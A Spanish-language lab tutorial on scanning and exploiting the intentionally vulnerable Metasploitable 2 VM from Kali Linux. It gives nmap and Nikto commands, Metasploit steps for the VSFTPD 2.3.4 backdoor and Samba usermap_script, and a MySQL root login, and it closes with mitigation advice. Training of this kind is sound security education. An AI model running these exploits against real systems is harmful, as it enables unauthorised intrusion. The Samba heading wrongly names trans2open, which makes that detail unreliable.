Plan detallado para comprobar las vulnerabilidades de Metasploitable 2 usando
Kali Linux. Este plan está diseñado de manera didáctica para que sea fácil de
seguir y entender. Metasploitable 2 es una máquina virtual vulnerable diseñada
específicamente para pruebas de seguridad y formación en ciberseguridad.
Paso 1: Configuración del Entorno
Descargar e instalar VirtualBox o VMware: Si no lo tienes ya, descarga e instala VirtualBox o VMware Workstation Player.
Descargar Metasploitable 2: Descarga la máquina virtual de Metasploitable 2 desde el sitio oficial de Rapid7.
Configurar la Máquina Virtual: Importa la máquina virtual de Metasploitable 2 en VirtualBox o VMware y asegúrate de que esté en la misma red que tu máquina Kali Linux (puedes usar una red NAT o una red interna para aislamiento).
Iniciar las máquinas virtuales: Inicia tanto Metasploitable 2 como Kali Linux.
Paso 2: Reconocimiento
sudo nmap -sn 192.168.0.0/24
Escaneo de Puertos y Servicios
sudo nmap -A -T4 <IP-de-Metasploitable2>
Paso 3: Identificación de Vulnerabilidades
Buscar servicios vulnerables
Analiza los resultados del escaneo de Nmap para identificar servicios conocidos por ser vulnerables. Metasploitable 2 incluye servicios como
FTP, SSH, Telnet, SMB, y varios otros.
Uso de Nikto para análisis de vulnerabilidades web
sudo nikto -h <IP-de-Metasploitable2>
Paso 4: Explotación de Vulnerabilidades
A continuación, se describen algunas vulnerabilidades comunes en Metasploitable
2 y cómo explotarlas.
Explotación de VSFTPD 2.3.4
Identificación: VSFTPD 2.3.4 es un servicio
FTP que tiene una puerta trasera conocida.
Uso de Metasploit:
sudo msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST <IP-de-Metasploitable2>
exploit
Explotación de Samba (SMB) usando el exploit de trans2open
sudo msfconsole
use exploit/multi/samba/usermap_script
set RHOST <IP-de-Metasploitable2>
exploit
Explotación de una vulnerabilidad en la base de datos MySQL
mysql -u root -p -h <IP-de-Metasploitable2>
Introduce la contraseña root.
Una vez dentro de la base de datos, puedes ejecutar comandos SQL maliciosos.
Paso 5: Documentación y Mitigación
Documentar las vulnerabilidades encontradas: Registra todas las vulnerabilidades identificadas, los métodos de explotación utilizados y los resultados obtenidos.
Recomendar medidas de mitigación: Sugiere cómo pueden solucionarse estas vulnerabilidades, como actualizar el software, cambiar credenciales por defecto, y deshabilitar servicios innecesarios.
Conclusión
Este plan proporciona una guía completa para la evaluación y explotación de
vulnerabilidades en Metasploitable 2 usando Kali Linux. Cada paso incluye
instrucciones detalladas y comandos específicos para facilitar el aprendizaje y
la comprensión.